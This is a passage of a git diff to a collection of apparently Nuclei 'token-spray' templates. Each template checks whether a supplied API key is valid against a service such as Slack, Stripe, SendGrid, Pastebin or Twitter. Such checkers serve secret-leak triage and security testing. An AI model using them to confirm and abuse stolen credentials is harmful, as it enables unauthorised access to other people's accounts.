"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865"]}, "anonymous": 1, "delivery_method": "email_attachment"} + --545d0ca717a743c3bd4fa575585f74c6 + Content-Disposition: form-data; name="file"; filename="1.txt" + + dssd + + --545d0ca717a743c3bd4fa575585f74c6-- + + matchers: + - type: word + part: body + words: + - '"query_status": "inserted"' + - '"query_status": "file_already_known"' + condition: or + +# digest: 4b0a00483046022100f5d19c2f0a4b8aaf9f21dd936fba07954a82d880f3c014db4faba4fb2a535538022100bf2a275e923f4190c5b7d398ac019329cdb75af155007fe5b6822fc577741533:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-malwarebazaar-459.yaml b/poc/api/api-malwarebazaar-459.yaml index ce99bd0a43..f261796b92 100644 --- a/poc/api/api-malwarebazaar-459.yaml +++ b/poc/api/api-malwarebazaar-459.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://bazaar.abuse.ch/api/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/MalwareBazaar.md + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/MalwareBazaar.md tags: token-spray,malwarebazaar self-contained: true diff --git a/poc/api/api-mapbox.yaml b/poc/api/api-mapbox.yaml deleted file mode 100644 index c4640d9695..0000000000 --- a/poc/api/api-mapbox.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: api-mapbox - -info: - name: Mapbox API Test - author: zzeitlin - reference: https://docs.mapbox.com/api/search/geocoding/ - severity: info - tags: token-spray,mapbox - -requests: - - method: GET - path: - - "https://api.mapbox.com/geocoding/v5/mapbox.places/Los%20Angeles.json?access_token={{token}}" - - matchers: - - type: status - status: - - 401 - negative: true diff --git a/poc/api/api-mojoauth-466.yaml b/poc/api/api-mojoauth-466.yaml deleted file mode 100644 index 85c9820f23..0000000000 --- a/poc/api/api-mojoauth-466.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: api-mojoauth - -info: - name: MojoAuth API Test - author: daffainfo - severity: info - description: Secure and modern passwordless authentication platform - reference: - - https://mojoauth.com/docs/ - - https://github.com/daffainfo/all-about-apikey/tree/main/mojoauth - metadata: - max-request: 1 - tags: token-spray,mojoauth - -self-contained: true - -http: - - raw: - - | - POST https://api.mojoauth.com/token/jwks HTTP/1.1 - Host: api.mojoauth.com - X-API-Key: {{token}} - - matchers: - - type: word - part: body - words: - - '"keys"' - - '"kty"' - - '"kid"' - condition: and - -# digest: 4a0a0047304502200506d39f1578c027a21bc88f89e4c08aeb679ca01db946d0b2bfb56e7d8c615d022100b6123ee1887fe67d62e526c14ad9b4bd755d1727085a16877bbb8b59651f33ba:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-mojoauth.yaml b/poc/api/api-mojoauth.yaml new file mode 100644 index 0000000000..db56c9a9bc --- /dev/null +++ b/poc/api/api-mojoauth.yaml @@ -0,0 +1,28 @@ +id: api-mojoauth + +info: + name: MojoAuth API Test + author: daffainfo + severity: info + description: Secure and modern passwordless authentication platform + reference: + - https://mojoauth.com/docs/ + - https://github.com/daffainfo/all-about-apikey/tree/main/mojoauth + tags: token-spray,mojoauth + +self-contained: true +requests: + - raw: + - | + POST https://api.mojoauth.com/token/jwks HTTP/1.1 + Host: api.mojoauth.com + X-API-Key: {{token}} + + matchers: + - type: word + part: body + words: + - '"keys"' + - '"kty"' + - '"kid"' + condition: and diff --git a/poc/api/api-mywot-468.yaml b/poc/api/api-mywot-468.yaml deleted file mode 100644 index 6f1f3daaf1..0000000000 --- a/poc/api/api-mywot-468.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: api-mywot - -info: - name: My Web of Trust API - author: daffainfo - severity: info - description: IP/domain/URL reputation - reference: - - https://support.mywot.com/hc/en-us/sections/360004477734-API- - - https://github.com/daffainfo/all-about-apikey/tree/main/web-of-trust - metadata: - max-request: 1 - tags: token-spray,weboftrust - -self-contained: true - -http: - - raw: - - | - GET https://scorecard.api.mywot.com/v3/targets?t=hbo.com&t=google.com HTTP/1.1 - Host: scorecard.api.mywot.com - x-user-id: {{id}} - x-api-key: {{token}} - - matchers: - - type: word - part: body - words: - - '"target":' - - '"safety":' - condition: and - -# digest: 490a00463044022050822dedbfa563ddf5000add7b851539b264a5b3a2b59a8669ea936e869c9b4802207ada282ba59cbc6034abd040b87aca4b296b655d7de41e31af8297ebae4bf2f9:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-nerdgraph-469.yaml b/poc/api/api-nerdgraph-469.yaml deleted file mode 100644 index d367685e7f..0000000000 --- a/poc/api/api-nerdgraph-469.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: api-nerdgraph - -info: - name: New Relic NerdGraph API Test - author: zzeitlin - severity: info - reference: https://docs.newrelic.com/docs/apis/nerdgraph/get-started/introduction-new-relic-nerdgraph/ - tags: token-spray,newrelic,nerdgraph - -self-contained: true -requests: - - method: POST - path: - - "https://api.newrelic.com/graphql" - headers: - Content-Type: application/json - API-Key: "{{token}}" - body: "{ \"query\": \"{ requestContext { userId apiKey }}\" }" - - matchers: - - type: word - part: body - negative: true - words: - - 'errors' diff --git a/poc/api/api-nerdgraph.yaml b/poc/api/api-nerdgraph.yaml index d67d458faa..d367685e7f 100644 --- a/poc/api/api-nerdgraph.yaml +++ b/poc/api/api-nerdgraph.yaml @@ -3,10 +3,11 @@ id: api-nerdgraph info: name: New Relic NerdGraph API Test author: zzeitlin - reference: https://docs.newrelic.com/docs/apis/nerdgraph/get-started/introduction-new-relic-nerdgraph/ severity: info + reference: https://docs.newrelic.com/docs/apis/nerdgraph/get-started/introduction-new-relic-nerdgraph/ tags: token-spray,newrelic,nerdgraph +self-contained: true requests: - method: POST path: diff --git a/poc/api/api-netlify-470.yaml b/poc/api/api-netlify-470.yaml deleted file mode 100644 index fd4aacbc89..0000000000 --- a/poc/api/api-netlify-470.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: api-netlify - -info: - name: Netlify API Test - author: dwisiswant0 - severity: info - reference: - - https://docs.netlify.com/api/get-started/ - metadata: - max-request: 1 - tags: token-spray,netlify - -self-contained: true - -http: - - method: GET - path: - - "https://api.netlify.com/api/v1/sites" - - headers: - Authorization: Bearer {{token}} - matchers: - - type: word - part: body - words: - - '"id":' - - '"premium":' - - '"claimed":' - condition: and - -# digest: 4a0a0047304502207e42d56f08b8711aa9e2dc68c1f03484bcbffd91ca75cb894339fcf576a0f8b3022100b30d2ae584362d29f0e05772a69ed14161d80a266266ac43269a1be95e9eb013:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-netlify.yaml b/poc/api/api-netlify.yaml new file mode 100644 index 0000000000..e57127c9f5 --- /dev/null +++ b/poc/api/api-netlify.yaml @@ -0,0 +1,25 @@ +id: api-netlify + +info: + name: Netlify API Test + author: dwisiswant0 + severity: info + reference: https://docs.netlify.com/api/get-started/ + tags: token-spray,netlify + +self-contained: true +requests: + - method: GET + path: + - "https://api.netlify.com/api/v1/sites" + headers: + Authorization: Bearer {{token}} + + matchers: + - type: word + part: body + words: + - '"id":' + - '"premium":' + - '"claimed":' + condition: and diff --git a/poc/api/api-onelogin-472.yaml b/poc/api/api-onelogin-472.yaml deleted file mode 100644 index 1a1de60b69..0000000000 --- a/poc/api/api-onelogin-472.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: api-onelogin - -info: - name: OneLogin API Test - author: dwisiswant0 - severity: info - reference: - - https://developers.onelogin.com/api-docs/2/getting-started/dev-overview - metadata: - max-request: 2 - tags: token-spray,onelogin - -self-contained: true - -http: - - method: GET - path: - - "https://api.us.onelogin.com/api/2/apps" - - "https://api.eu.onelogin.com/api/2/apps" - - headers: - Authorization: Bearer {{token}} - stop-at-first-match: true - matchers: - - type: word - part: body - words: - - '"id":' - - '"connector_id":' - - '"auth_method":' - condition: and - -# digest: 4b0a00483046022100c863b1c5238bae97a22123c1fbcc2dffca09b867f1799b647646ae4ecc1fa317022100e9d0e913bb9c5089ceb35ecb0caa5f24a658dbd956febbb59d91a64027c9c728:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-onelogin.yaml b/poc/api/api-onelogin.yaml new file mode 100644 index 0000000000..d8369ad80b --- /dev/null +++ b/poc/api/api-onelogin.yaml @@ -0,0 +1,27 @@ +id: api-onelogin + +info: + name: OneLogin API Test + author: dwisiswant0 + severity: info + reference: https://developers.onelogin.com/api-docs/2/getting-started/dev-overview + tags: token-spray,onelogin + +self-contained: true +requests: + - method: GET + path: + - "https://api.us.onelogin.com/api/2/apps" + - "https://api.eu.onelogin.com/api/2/apps" + headers: + Authorization: Bearer {{token}} + + stop-at-first-match: true + matchers: + - type: word + part: body + words: + - '"id":' + - '"connector_id":' + - '"auth_method":' + condition: and diff --git a/poc/api/api-openweather-473.yaml b/poc/api/api-openweather-473.yaml index 1a9a5058e3..13a26aecc3 100644 --- a/poc/api/api-openweather-473.yaml +++ b/poc/api/api-openweather-473.yaml @@ -3,16 +3,21 @@ id: api-openweather info: name: OpenWeather API Test author: zzeitlin - reference: https://openweathermap.org/current severity: info + reference: https://openweathermap.org/current tags: token-spray,weather,openweather +self-contained: true requests: - method: GET path: - "https://api.openweathermap.org/data/2.5/weather?q=Chicago&appid={{token}}" matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"coord":' + - '"weather":' + - '"base":' + condition: and diff --git a/poc/api/api-optimizely-474.yaml b/poc/api/api-optimizely-474.yaml deleted file mode 100644 index 25a23c18b3..0000000000 --- a/poc/api/api-optimizely-474.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: api-optimizely - -info: - name: Optimizely API Test - author: dwisiswant0 - severity: info - reference: - - https://library.optimizely.com/docs/api/app/v2/index.html - metadata: - max-request: 1 - tags: token-spray,optimizely - -self-contained: true - -http: - - method: GET - path: - - "https://api.optimizely.com/v2/projects" - - headers: - Authorization: Bearer {{token}} - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - '"account_id":' - - '"confidence_threshold":' - condition: and - -# digest: 4a0a0047304502200e0896ced0ae45af026caa68a51a407a977c44840900fc8033d7e3918664728802210094df7aee196e4a226817f81cae24bb792964551c0ddd9b825a68095b6aba9ba1:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-optimizely.yaml b/poc/api/api-optimizely.yaml new file mode 100644 index 0000000000..48105d1bec --- /dev/null +++ b/poc/api/api-optimizely.yaml @@ -0,0 +1,29 @@ +id: api-optimizely + +info: + name: Optimizely API Test + author: dwisiswant0 + severity: info + reference: https://library.optimizely.com/docs/api/app/v2/index.html + tags: token-spray,optimizely + +self-contained: true +requests: + - method: GET + path: + - "https://api.optimizely.com/v2/projects" + headers: + Authorization: Bearer {{token}} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - '"account_id":' + - '"confidence_threshold":' + condition: and \ No newline at end of file diff --git a/poc/api/api-pastebin-477.yaml b/poc/api/api-pastebin-477.yaml deleted file mode 100644 index 8ba34c233c..0000000000 --- a/poc/api/api-pastebin-477.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: api-pastebin - -info: - name: Pastebin API Test - author: daffainfo - severity: info - description: Plain Text Storage - reference: - - https://pastebin.com/doc_api - - https://github.com/daffainfo/all-about-apikey/tree/main/pastebin - metadata: - max-request: 1 - tags: token-spray,pastebin - -self-contained: true - -http: - - raw: - - | - POST https://pastebin.com/api/api_post.php HTTP/1.1 - Host: pastebin.com - Content-Type: application/x-www-form-urlencoded - Content-Length: 81 - - api_dev_key={{token}}&api_paste_code=test&api_option=paste - - matchers: - - type: word - part: body - words: - - 'https://pastebin.com/' - -# digest: 4b0a00483046022100eac9e0b97c3915c66cda23bbd328df846b9621894c0963d6062014c114dcef660221008fd9e82eabfc93bc07c39c981b6c8cdf815eb65b00212b1ceaefdb29cb3eabdb:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-pastebin.yaml b/poc/api/api-pastebin.yaml new file mode 100644 index 0000000000..ab46ebbc09 --- /dev/null +++ b/poc/api/api-pastebin.yaml @@ -0,0 +1,28 @@ +id: api-pastebin + +info: + name: Pastebin API Test + author: daffainfo + severity: info + description: Plain Text Storage + reference: + - https://pastebin.com/doc_api + - https://github.com/daffainfo/all-about-apikey/tree/main/pastebin + tags: token-spray,pastebin + +self-contained: true +requests: + - raw: + - | + POST https://pastebin.com/api/api_post.php HTTP/1.1 + Host: pastebin.com + Content-Type: application/x-www-form-urlencoded + Content-Length: 81 + + api_dev_key={{token}}&api_paste_code=test&api_option=paste + + matchers: + - type: word + part: body + words: + - 'https://pastebin.com/' diff --git a/poc/api/api-pendo-479.yaml b/poc/api/api-pendo.yaml similarity index 100% rename from poc/api/api-pendo-479.yaml rename to poc/api/api-pendo.yaml diff --git a/poc/api/api-petfinder-480.yaml b/poc/api/api-petfinder-480.yaml new file mode 100644 index 0000000000..7067e2d97a --- /dev/null +++ b/poc/api/api-petfinder-480.yaml @@ -0,0 +1,36 @@ +id: api-petfinder + +info: + name: Petfinder API Test + author: daffainfo + severity: info + description: Petfinder is dedicated to helping pets find homes, another resource to get pets adopted + reference: + - https://www.petfinder.com/developers/v2/docs/ + - https://github.com/daffainfo/all-about-apikey/tree/main/petfinder + metadata: + max-request: 1 + tags: token-spray,petfinder + +self-contained: true + +http: + - raw: + - | + POST https://api.petfinder.com/v2/oauth2/token HTTP/1.1 + Host: api.petfinder.com + Content-Type: application/x-www-form-urlencoded + Content-Length: 81 + + grant_type=client_credentials&client_id={{id}}&client_secret={{secret}} + + matchers: + - type: word + part: body + words: + - '"token_type"' + - '"expires_in"' + - '"access_token"' + condition: and + +# digest: 490a0046304402205df678454684e798c9f3bfe4c88e7b86a5fe36217b85109635c57b13df65cbc702202539e9116f2321678f5c72b1f510e253761d1e1c425ee6cd15fcdc3bac2f77e5:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-petfinder.yaml b/poc/api/api-petfinder.yaml deleted file mode 100644 index ae0b6866a1..0000000000 --- a/poc/api/api-petfinder.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: api-petfinder - -info: - name: Petfinder API Test - author: daffainfo - severity: info - description: Petfinder is dedicated to helping pets find homes, another resource to get pets adopted - reference: - - https://www.petfinder.com/developers/v2/docs/ - - https://github.com/daffainfo/all-about-apikey/tree/main/petfinder - tags: token-spray,petfinder - -self-contained: true -requests: - - raw: - - | - POST https://api.petfinder.com/v2/oauth2/token HTTP/1.1 - Host: api.petfinder.com - Content-Type: application/x-www-form-urlencoded - Content-Length: 81 - - grant_type=client_credentials&client_id={{id}}&client_secret={{secret}} - - matchers: - - type: word - part: body - words: - - '"token_type"' - - '"expires_in"' - - '"access_token"' - condition: and diff --git a/poc/api/api-pivotaltracker-482.yaml b/poc/api/api-pivotaltracker-482.yaml index c52e04af9a..1f7e7007e0 100644 --- a/poc/api/api-pivotaltracker-482.yaml +++ b/poc/api/api-pivotaltracker-482.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,pivotaltracker +self-contained: true requests: - method: GET path: @@ -20,3 +21,4 @@ requests: negative: true words: - 'invalid_authentication' + - 'unauthenticated' diff --git a/poc/api/api-pivotaltracker.yaml b/poc/api/api-pivotaltracker.yaml new file mode 100644 index 0000000000..c52e04af9a --- /dev/null +++ b/poc/api/api-pivotaltracker.yaml @@ -0,0 +1,22 @@ +id: api-pivotaltracker + +info: + name: PivotalTracker API Test + author: zzeitlin + reference: https://www.pivotaltracker.com/help/api + severity: info + tags: token-spray,pivotaltracker + +requests: + - method: GET + path: + - "https://www.pivotaltracker.com/services/v5/me" + headers: + X-TrackerToken: "{{token}}" + + matchers: + - type: word + part: body + negative: true + words: + - 'invalid_authentication' diff --git a/poc/api/api-postmark-483.yaml b/poc/api/api-postmark-483.yaml index b9bec134db..2b6f1fb642 100644 --- a/poc/api/api-postmark-483.yaml +++ b/poc/api/api-postmark-483.yaml @@ -4,18 +4,22 @@ info: name: PostMark API Test author: zzeitlin severity: info - reference: https://postmarkapp.com/developer/api/overview + reference: + - https://postmarkapp.com/developer/api/overview + metadata: + max-request: 1 tags: token-spray,postmark self-contained: true -requests: + +http: - method: GET path: - "https://api.postmarkapp.com/server" + headers: Accept: application/json X-Postmark-Server-Token: "{{token}}" - matchers: - type: word part: body @@ -24,3 +28,5 @@ requests: - '"Name":' - '"ApiTokens":' condition: and + +# digest: 4b0a004830460221009f72230cb95ff7d337df8d19e0c572446a58a42ce5f962b301ee655a73cb3d93022100d773d742b5fea63e0a0d73c936e4343ce548f2dc8f0183b8649a4f92b64b4552:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-rijksmuseum-485.yaml b/poc/api/api-rijksmuseum-485.yaml index 11327595a7..6e6c1c40cd 100644 --- a/poc/api/api-rijksmuseum-485.yaml +++ b/poc/api/api-rijksmuseum-485.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://data.rijksmuseum.nl/user-generated-content/api/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Art%20Design/Rijksmuseum.md + - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Rijksmuseum.md tags: token-spray,rijksmuseum self-contained: true diff --git a/poc/api/api-rijksmuseum.yaml b/poc/api/api-rijksmuseum.yaml new file mode 100644 index 0000000000..11327595a7 --- /dev/null +++ b/poc/api/api-rijksmuseum.yaml @@ -0,0 +1,25 @@ +id: api-rijksmuseum + +info: + name: Rijksmuseum API Test + author: daffainfo + severity: info + reference: + - https://data.rijksmuseum.nl/user-generated-content/api/ + - https://github.com/daffainfo/all-about-apikey/blob/main/Art%20Design/Rijksmuseum.md + tags: token-spray,rijksmuseum + +self-contained: true +requests: + - method: GET + path: + - "https://www.rijksmuseum.nl/api/nl/usersets?key={{token}}&format=json&page=2" + + matchers: + - type: word + part: body + words: + - '"count":' + - '"userSets":' + - '"user":' + condition: and diff --git a/poc/api/api-sendgrid-489.yaml b/poc/api/api-sendgrid-489.yaml index 3c24d1dfaf..3bf3692649 100644 --- a/poc/api/api-sendgrid-489.yaml +++ b/poc/api/api-sendgrid-489.yaml @@ -4,20 +4,25 @@ info: name: Sendgrid API Test author: zzeitlin severity: info - reference: https://docs.sendgrid.com/for-developers/sending-email/getting-started-smtp + reference: + - https://docs.sendgrid.com/for-developers/sending-email/getting-started-smtp + metadata: + max-request: 1 tags: token-spray,sendgrid self-contained: true -network: +tcp: - inputs: - data: "ehlo\r\n" read: 1024 + - data: "AUTH PLAIN {{base64(hex_decode('00')+'apikey'+hex_decode('00')+token)}}\r\n" read: 1024 host: - "tls://smtp.sendgrid.net:465" - matchers: - type: word words: - "Authentication successful" + +# digest: 4b0a004830460221008e0e74cc516e39557ab0c6778b54c5057b78391e494874ccb1cb0affe9888d67022100892b564dc499c64d59217eb15a6fdecdf2c0b5873366ee7093b857e2a2b43e92:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-slack-493.yaml b/poc/api/api-slack-493.yaml index d9a36d5801..44860be49e 100644 --- a/poc/api/api-slack-493.yaml +++ b/poc/api/api-slack-493.yaml @@ -3,18 +3,22 @@ id: api-slack info: name: Slack API Test author: zzeitlin - reference: https://api.slack.com/methods/auth.test severity: info + reference: + - https://api.slack.com/methods/auth.test + metadata: + max-request: 1 tags: token-spray,slack self-contained: true -requests: + +http: - method: POST path: - "https://slack.com/api/auth.test" + headers: Authorization: Bearer {{token}} - matchers: - type: word part: body @@ -22,4 +26,6 @@ requests: - '"url":' - '"team_id":' - '"user_id":' - condition: and \ No newline at end of file + condition: and + +# digest: 4a0a00473045022038d30fc64439fc7fbb00f44638d70894932e42434f6be7110cbe662c19630683022100f3d3ad433c07c882a6f224986257319d1a1c171e7998a62c1a6a547db9126e49:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-slack.yaml b/poc/api/api-slack.yaml deleted file mode 100644 index 2703830f3a..0000000000 --- a/poc/api/api-slack.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: api-slack - -info: - name: Slack API Test - author: zzeitlin - reference: https://api.slack.com/methods/auth.test - severity: info - tags: token-spray,slack - -requests: - - method: POST - path: - - "https://slack.com/api/auth.test" - headers: - Authorization: Bearer {{token}} - - matchers: - - type: word - part: body - words: - - 'error' - negative: true diff --git a/poc/api/api-sonarcloud.yaml b/poc/api/api-sonarcloud.yaml new file mode 100644 index 0000000000..fdf0dc6724 --- /dev/null +++ b/poc/api/api-sonarcloud.yaml @@ -0,0 +1,21 @@ +id: api-sonarcloud + +info: + name: SonarCloud API Test + author: zzeitlin + reference: https://sonarcloud.io/web_api/api/authentication + severity: info + tags: token-spray,sonarcloud + +requests: + - method: GET + path: + - "https://sonarcloud.io/api/authentication/validate" + headers: + Authorization: Basic {{base64(token + ':')}} + + matchers: + - type: word + part: body + words: + - 'true' diff --git a/poc/api/api-square.yaml b/poc/api/api-square.yaml deleted file mode 100644 index 383e3ddc8a..0000000000 --- a/poc/api/api-square.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: api-square - -info: - name: Square API Test - author: zzeitlin - reference: https://developer.squareup.com/explorer/square/locations-api/list-locations - severity: info - tags: token-spray,square - -requests: - - method: GET - path: - - "https://connect.squareup.com/v2/locations" - - "https://connect.squareupsandbox.com/v2/locations" - headers: - Content-Type: application/json - Authorization: Bearer {{token}} - - matchers: - - type: word - part: body - words: - - 'errors' - negative: true diff --git a/poc/api/api-stripe-499.yaml b/poc/api/api-stripe-499.yaml index d06b38bd8c..9cc7a9ab66 100644 --- a/poc/api/api-stripe-499.yaml +++ b/poc/api/api-stripe-499.yaml @@ -4,17 +4,21 @@ info: name: Stripe API Test author: zzeitlin severity: info - reference: https://stripe.com/docs/api/authentication + reference: + - https://stripe.com/docs/api/authentication + metadata: + max-request: 1 tags: token-spray,stripe self-contained: true -requests: + +http: - method: GET path: - "https://api.stripe.com/v1/charges" + headers: Authorization: Basic {{base64(token + ':')}} - matchers: - type: word part: body @@ -22,4 +26,6 @@ requests: - '"object":' - '"url":' - '"data":' - condition: and \ No newline at end of file + condition: and + +# digest: 4a0a0047304502200445fe12871c2cfc4922b033fed7a76b28b2e431418f5130d42c61184385d820022100bcd5106200876acebb0dba7377f10eb7d985495f8490b17f411abb2353405785:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-stytch-500.yaml b/poc/api/api-stytch-500.yaml deleted file mode 100644 index 0a4a0536b3..0000000000 --- a/poc/api/api-stytch-500.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: api-stytch - -info: - name: Stytch API Test - author: daffainfo - severity: info - description: User infrastructure for modern applications - reference: - - https://stytch.com/docs/api - - https://github.com/daffainfo/all-about-apikey/tree/main/stytch - metadata: - max-request: 1 - tags: token-spray,stytch - -self-contained: true - -http: - - raw: - - | - POST https://test.stytch.com/v1/users HTTP/1.1 - Authorization: Basic {{base64(id + ':' + secret)}} - Host: test.stytch.com - Content-Type: application/json - - {"email": "test@stytch.com"} - - matchers: - - type: word - part: body - words: - - '"status_code":' - - '"request_id":' - - '"user_id":' - condition: and - -# digest: 4b0a00483046022100a5cd3e56f14a5ca4f85a1244c252638f6287c623c199acd405e00ea2c8d2b4cb022100a793ced41f64583f4441e567c70c60d66e152ee792c7cea85a713109202c1662:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-stytch.yaml b/poc/api/api-stytch.yaml new file mode 100644 index 0000000000..37caf808d3 --- /dev/null +++ b/poc/api/api-stytch.yaml @@ -0,0 +1,31 @@ +id: api-stytch + +info: + name: Stytch API Test + author: daffainfo + severity: info + description: User infrastructure for modern applications + reference: + - https://stytch.com/docs/api + - https://github.com/daffainfo/all-about-apikey/tree/main/stytch + tags: token-spray,stytch + +self-contained: true +requests: + - raw: + - | + POST https://test.stytch.com/v1/users HTTP/1.1 + Authorization: Basic {{base64(id + ':' + secret)}} + Host: test.stytch.com + Content-Type: application/json + + {"email": "test@stytch.com"} + + matchers: + - type: word + part: body + words: + - '"status_code":' + - '"request_id":' + - '"user_id":' + condition: and \ No newline at end of file diff --git a/poc/api/api-taiga-501.yaml b/poc/api/api-taiga-501.yaml new file mode 100644 index 0000000000..813c76f3ea --- /dev/null +++ b/poc/api/api-taiga-501.yaml @@ -0,0 +1,30 @@ +id: api-taiga + +info: + name: Taiga API Test + author: dwisiswant0 + severity: info + reference: + - https://docs.taiga.io/api.html + metadata: + max-request: 1 + tags: token-spray,taiga + +self-contained: true + +http: + - method: GET + path: + - "https://api.taiga.io/api/v1/application-tokens" + + headers: + Authorization: Bearer {{token}} + matchers: + - type: word + part: body + words: + - '"auth_code":' + - '"state":' + condition: and + +# digest: 4b0a00483046022100bf3ead9df9b8a73d035d356ac82460543b9f33a6ba786736564746301d5c75b1022100a498eba13eb325a9e2ecf7d1fe784b5598bb024e888df4601a928c19c9bb2f16:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-taiga.yaml b/poc/api/api-taiga.yaml deleted file mode 100644 index 6e8748bdf1..0000000000 --- a/poc/api/api-taiga.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: api-taiga - -info: - name: Taiga API Test - author: dwisiswant0 - reference: https://docs.taiga.io/api.html - severity: info - tags: token-spray,taiga - -self-contained: true -requests: - - method: GET - path: - - "https://api.taiga.io/api/v1/application-tokens" - headers: - Authorization: Bearer {{token}} - - matchers: - - type: word - part: body - words: - - '"auth_code":' - - '"state":' - condition: and diff --git a/poc/api/api-thecatapi-502.yaml b/poc/api/api-thecatapi-502.yaml deleted file mode 100644 index 54740e47d8..0000000000 --- a/poc/api/api-thecatapi-502.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: api-thecatapi - -info: - name: TheCatApi API Test - author: daffainfo - severity: info - reference: - - https://docs.thecatapi.com/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Animals/TheCatApi.md - tags: token-spray,thecatapi - -self-contained: true -requests: - - method: GET - path: - - "https://api.thecatapi.com/v1/votes" - headers: - x-api-key: "{{token}}" - - matchers: - - type: word - part: body - words: - - 'id":' - - 'image_id":' - - 'sub_id":' - condition: and diff --git a/poc/api/api-thecatapi.yaml b/poc/api/api-thecatapi-503.yaml similarity index 100% rename from poc/api/api-thecatapi.yaml rename to poc/api/api-thecatapi-503.yaml diff --git a/poc/api/api-travisci-506.yaml b/poc/api/api-travisci-506.yaml index 1a66071c7a..63489fc886 100644 --- a/poc/api/api-travisci-506.yaml +++ b/poc/api/api-travisci-506.yaml @@ -4,14 +4,11 @@ info: name: Travis CI API Test author: zzeitlin severity: info - reference: - - https://developer.travis-ci.com/ + reference: https://developer.travis-ci.com/ tags: token-spray,travis - metadata: - max-request: 1 self-contained: true -http: +requests: - method: GET path: - "https://api.travis-ci.com/user" @@ -24,4 +21,3 @@ http: status: - 403 negative: true -# digest: 4a0a00473045022100ef21fb10a0c1f5fff7a5b0cc6e22678120d684f0c02a65cc4b70e2854a11625802203a9e8a5722ab1768ffe61d860673375995ccf315fa5b18fe80fed706efdfaaef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/api/api-twitter-507.yaml b/poc/api/api-twitter-507.yaml deleted file mode 100644 index a9a704e6b0..0000000000 --- a/poc/api/api-twitter-507.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: api-twitter - -info: - name: Twitter API Test - author: zzeitlin - severity: info - reference: - - https://developer.twitter.com/en/docs/twitter-api/api-reference-index - metadata: - max-request: 1 - tags: token-spray,twitter - -self-contained: true - -http: - - method: GET - path: - - "https://api.twitter.com/1.1/account_activity/all/subscriptions/count.json" - - headers: - Authorization: Bearer {{token}} - matchers: - - type: word - part: body - words: - - '"account_name":' - - '"subscriptions_count_all":' - condition: and - -# digest: 490a0046304402201f9521f0cd83f3554263fbdeaad4741f2f3ca31b751092c94fd963af565f1ff50220407abb1793a0b6085d114c705dd6787a12930f4ac0c7974c4ee5abd41f6713f9:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-twitter.yaml b/poc/api/api-twitter.yaml new file mode 100644 index 0000000000..ce6de967e8 --- /dev/null +++ b/poc/api/api-twitter.yaml @@ -0,0 +1,24 @@ +id: api-twitter + +info: + name: Twitter API Test + author: zzeitlin + severity: info + reference: https://developer.twitter.com/en/docs/twitter-api/api-reference-index + tags: token-spray,twitter + +self-contained: true +requests: + - method: GET + path: + - "https://api.twitter.com/1.1/account_activity/all/subscriptions/count.json" + headers: + Authorization: Bearer {{token}} + + matchers: + - type: word + part: body + words: + - '"account_name":' + - '"subscriptions_count_all":' + condition: and diff --git a/poc/api/api-urlscan-509.yaml b/poc/api/api-urlscan-509.yaml new file mode 100644 index 0000000000..bcb14d8c1c --- /dev/null +++ b/poc/api/api-urlscan-509.yaml @@ -0,0 +1,28 @@ +id: api-urlscan + +info: + name: URLScan API Test + author: daffainfo + severity: info + reference: + - https://urlscan.io/docs/api/ + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/URLScan.md + tags: token-spray,urlscan + +self-contained: true +requests: + - raw: + - | + GET https://urlscan.io/user/quotas/ HTTP/1.1 + Host: urlscan.io + Content-Type: application/json + API-Key: {{token}} + + matchers: + - type: word + part: body + words: + - 'X-Rate-Limit-Scope:' + - 'X-Rate-Limit-Limit:' + - 'X-Rate-Limit-Remaining:' + condition: and diff --git a/poc/api/api-urlscan-508.yaml b/poc/api/api-urlscan.yaml similarity index 100% rename from poc/api/api-urlscan-508.yaml rename to poc/api/api-urlscan.yaml diff --git a/poc/api/api-vercel-510.yaml b/poc/api/api-vercel-510.yaml new file mode 100644 index 0000000000..872d16a87c --- /dev/null +++ b/poc/api/api-vercel-510.yaml @@ -0,0 +1,36 @@ +id: api-vercel + +info: + name: Vercel - API Detection + author: dwisiswant0 + severity: info + description: Vercel API was detected. + reference: + - 